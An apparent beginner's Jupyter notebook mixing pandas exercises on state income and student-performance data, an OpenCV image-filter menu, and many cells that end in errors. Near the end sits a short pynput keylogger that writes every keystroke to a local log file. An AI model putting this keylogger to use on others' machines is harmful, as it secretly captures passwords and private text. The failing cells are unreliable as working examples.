In [4]:
%matplotlib notebook
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
from sklearn.model_selection import train_test_split

fruits = pd.read_csv('Income.csv')

In [5]:
fruits

,GEOID,State,2005,2006,2007,2008,2009,2010,2011,2012,2013
0,04000US01,Alabama,37150,37952,42212,44476,39980,40933,42590,43464,41381
1,04000US02,Alaska,55891,56418,62993,63989,61604,57848,57431,63648,61137
2,04000US04,Arizona,45245,46657,62993,46914,45739,46896,48621,47044,50602
3,04000US05,Arkansas,36658,37057,40795,39586,36538,38587,41302,39018,39919
4,04000US06,California,51755,55319,55734,57014,56134,54283,53367,57020,57528

In [6]:
zip_csv=dict(zip(fruits.GEOID.unique(),fruits['2005'].unique()))

zip_csv

{'04000US01': 37150,
 '04000US02': 55891,
 '04000US04': 45245,
 '04000US05': 36658,
 '04000US06': 51755}

In [14]:
import matplotlib as plt

x=fruits[['2005','2006','2007','2008']]
y=fruits['State']

x_train,x_test,y_train,y_test=train_test_split(x,y,random_state=0)

In [15]:
x_train

    2005   2006   2007   2008
1  55891  56418  62993  63989
3  36658  37057  40795  39586
4  51755  55319  55734  57014

In [17]:
x_test

    2005   2006   2007   2008
2  45245  46657  62993  46914
0  37150  37952  42212  44476

In [18]:
y_train

1        Alaska
3      Arkansas
4    California
Name: State, dtype: object

In [19]:
y_test

2    Arizona
0    Alabama
Name: State, dtype: object

In [22]:
from matplotlib import cm
cmap = cm.get_cmap('gnuplot')
scatter = pd.scatter_matrix(x_train, c= y_train, marker = 'o', s=40, hist_kwds={'bins':15}, figsize=(9,9), cmap=cmap)

AttributeError: module 'matplotlib.cm' has no attribute 'scatter_matrix'

In [24]:
help(pd.scatter_matrix)

AttributeError: module 'pandas' has no attribute 'scatter_matrix'

In [30]:
from mpl_toolkits.mplot3d import Axes3D

fig = plt.figure()
ax = fig.add_subplot(111, projection = '3d')
ax.scatter(X_train['width'], X_train['height'], X_train['color_score'], c = y_train, marker = 'o', s=100)
ax.set_xlabel('width')
ax.set_ylabel('height')
ax.set_zlabel('color_score')
plt.show()

TypeError: 'module' object is not callable

In [2]:
import pandas as pd

m1=pd.read_csv("student-mat.csv",sep=";")

m1.head()

,school,sex,age,address,famsize,Pstatus,Medu,Fedu,Mjob,Fjob,...,famrel,freetime,goout,Dalc,Walc,health,absences,G1,G2,G3
0,GP,F,18,U,GT3,A,4,4,at_home,teacher,...,4,3,4,1,1,3,6,5,6,6
1,GP,F,17,U,GT3,T,1,1,at_home,other,...,5,3,3,1,1,3,4,5,5,6
2,GP,F,15,U,LE3,T,1,1,at_home,other,...,4,3,2,2,3,3,10,7,8,10
3,GP,F,15,U,GT3,T,4,2,health,services,...,3,2,2,1,1,5,2,15,14,15
4,GP,F,16,U,GT3,T,3,3,other,other,...,4,3,2,1,2,5,4,6,10,10

In [4]:
m1.columns

Index(['school', 'sex', 'age', 'address', 'famsize', 'Pstatus', 'Medu', 'Fedu',
       'Mjob', 'Fjob', 'reason', 'guardian', 'traveltime', 'studytime',
       'failures', 'schoolsup', 'famsup', 'paid', 'activities', 'nursery',
       'higher', 'internet', 'romantic', 'famrel', 'freetime', 'goout', 'Dalc',
       'Walc', 'health', 'absences', 'G1', 'G2', 'G3'],
      dtype='object')

In [7]:
m2=pd.read_csv("student-por.csv",sep=";")

m2.head()

,school,sex,age,address,famsize,Pstatus,Medu,Fedu,Mjob,Fjob,...,famrel,freetime,goout,Dalc,Walc,health,absences,G1,G2,G3
0,GP,F,18,U,GT3,A,4,4,at_home,teacher,...,4,3,4,1,1,3,4,0,11,11
1,GP,F,17,U,GT3,T,1,1,at_home,other,...,5,3,3,1,1,3,2,9,11,11
2,GP,F,15,U,LE3,T,1,1,at_home,other,...,4,3,2,2,3,3,6,12,13,12
3,GP,F,15,U,GT3,T,4,2,health,services,...,3,2,2,1,1,5,0,14,14,14
4,GP,F,16,U,GT3,T,3,3,other,other,...,4,3,2,1,2,5,0,11,13,13

In [8]:
m2.columns

Index(['school', 'sex', 'age', 'address', 'famsize', 'Pstatus', 'Medu', 'Fedu',
       'Mjob', 'Fjob', 'reason', 'guardian', 'traveltime', 'studytime',
       'failures', 'schoolsup', 'famsup', 'paid', 'activities', 'nursery',
       'higher', 'internet', 'romantic', 'famrel', 'freetime', 'goout', 'Dalc',
       'Walc', 'health', 'absences', 'G1', 'G2', 'G3'],
      dtype='object')

In [13]:
d3=pd.merge(m1,m2,by=c("school","sex","age","address","famsize","Pstatus","Medu","Fedu","Mjob","Fjob","reason","nursery","internet"))

TypeError: merge() got an unexpected keyword argument 'by'

In [14]:
import cv2
import numpy as np
import time
path=(input("Enter the Path of File:"))
img=cv2.imread(path,1)
dict_1={1:'Gray scale image',2:'Binary image',3:'Blue',4:'smoothing the image',5:'Blurring the image',6:'Detecting the edge of image',7:'saturation',8:'Green',9:'Red',10:'Value',11:'Hue',12:'cropping the image',13:'Doubling the image',14:'Transposing the image',15:'Face Detection'}
height=img.shape[0]
width=img.shape[1]
for i in range(1,len(dict_1)+1):
    print(i,'.',dict_1.get(i))
while(True):
    num=input('Enter the number which type of image you want:')
    cv2.imshow('image',img)
    if num=='1':
        img1=cv2.imread(path,0)
        cv2.imshow('image',img1)
    elif num=='2':
        ret,bw=cv2.threshold(img,127,255,cv2.THRESH_BINARY)#through thresholding we will try to provide the value the value through which we can put below the particular value we assign the value 0 and above it will be white. 
        cv2.imshow("Binary",bw)
        img1=bw
    elif num=='3':
        B,G,R=cv2.split(img)
        zeros=np.zeros((height,width),dtype="uint8")
        cv2.imshow("Blue",cv2.merge([B,zeros,zeros]))
        img1=cv2.merge([B,zeros,zeros])
    elif num=='4':
        bilateral=cv2.bilateralFilter(img,7,20,20)#9 ,75 and 75 are sigma color value and sigma space value affects cordinates space and color space 
        cv2.imshow("bilateral",bilateral)
        img1=bilateral
    elif num=='5':
        gaussian=cv2.GaussianBlur(img,(7,7),0)
        cv2.imshow("GaussianBlur",gaussian)
        img1=gaussian
    elif num=='6':
        canny=cv2.Canny(img,20,170)#This demand two thresholds from us i.e; 20 and 170 this is like lower and upper value 
        cv2.imshow("canny",canny)
        img1=canny
    elif num=='7':
        img_HSV=cv2.cvtColor(img,cv2.COLOR_BGR2HSV)
        cv2.imshow("saturation",img_HSV[:,:,1])
        img1=img_HSV[:,:,1]
    elif num=='8':
        B,G,R=cv2.split(img)
        zeros=np.zeros((height,width),dtype="uint8")
        cv2.imshow("Green",cv2.merge([zeros,G,zeros]))
        img1=cv2.merge([zeros,G,zeros])
    elif num=='9':
        B,G,R=cv2.split(img)
        zeros=np.zeros((height,width),dtype="uint8")
        cv2.imshow("Red",cv2.merge([zeros,zeros,R]))
        img1=cv2.merge([zeros,zeros,R])
    elif num=='10':
        img_HSV=cv2.cvtColor(img,cv2.COLOR_BGR2HSV)
        cv2.imshow("valuechannel",img_HSV[:,:,2])
        img1=img_HSV[:,:,2]
    elif num=='11':
        img_HSV=cv2.cvtColor(img,cv2.COLOR_BGR2HSV)
        cv2.imshow("Hue",img_HSV[:,:,0])
        img1=img_HSV[:,:,0]
    elif num=='12':
        height,width=img.shape[:2]
        start_row,start_col=int(height*0.10),int(width*0.10)#starting pixel coordinates (topleft,of cropping rectangles)
        end_row,end_col=int(height*0.86),int(width*0.86)#ending pixel coordinates (bottom right),this can be changed
        cropped=img[start_row:end_row,start_col:end_col]
        cv2.imshow('cropped',cropped)
        img1=cropped
    elif num=='13':
        resized=cv2.resize(img,(int(img.shape[1]*1.5),int(img.shape[0]*1.5)))#converting the float value into integer value
        cv2.imshow('resize',resized)
        img1=resized
    elif num=='14':
        rotation_image=cv2.transpose(img)#this will covert the image of horizontal pixel elements into vertical pixel elements as in matrix
        cv2.imshow("legend",rotation_image)
        img1=rotation_image
    elif num=='15':
        face_cascade=cv2.CascadeClassifier("haarcascade_frontalface_default.xml")
        gray_img=cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
        faces=face_cascade.detectMultiScale(gray_img,scaleFactor=1.06,minNeighbors=6)
        for x,y,w,h in faces:
            img1=cv2.rectangle(img,(x,y),(x+w,y+h),(0,0,255),3)
            cv2.imshow("Gray",img1)
    else:
        print('invalid input')
    cv2.waitKey(0)
    cv2.destroyAllWindows()
    save=input('Do you want to save?y/n')
    if save=='y':
        file=input('Enter the image name to be saved')
        cv2.imwrite(file+'.jpg',img1)
    elif save=='n':
        print('its ok')
    else:
        print('invalid input')
    a=input('Do you break?y/n')
    if a=='y':
        break
    elif a=='n':
        print('its ok')
    else:
        print('invalid input')
        pass

ModuleNotFoundError: No module named 'cv2'

In [15]:
from pynput.keyboard import Listener


def write_to_file(key):
    letter = str(key)
    letter = letter.replace("'", "")

    if letter == 'Key.space':
        letter = ' '
    if letter == 'Key.shift_r':
        letter = ''
    if letter == "Key.ctrl_l":
        letter = ""
    if letter == "Key.enter":
        letter = "\n"
    if letter=='Key.backspaceKey':
        letter=' '

    with open("log.txt", 'a') as f:
        f.write(letter)

# Collecting events until stopped

with Listener(on_press=write_to_file) as l:
    l.join()

ModuleNotFoundError: No module named 'pynput'

In [1]:
import pandas as pd

In [5]:
help(dropna)

NameError: name 'dropna' is not defined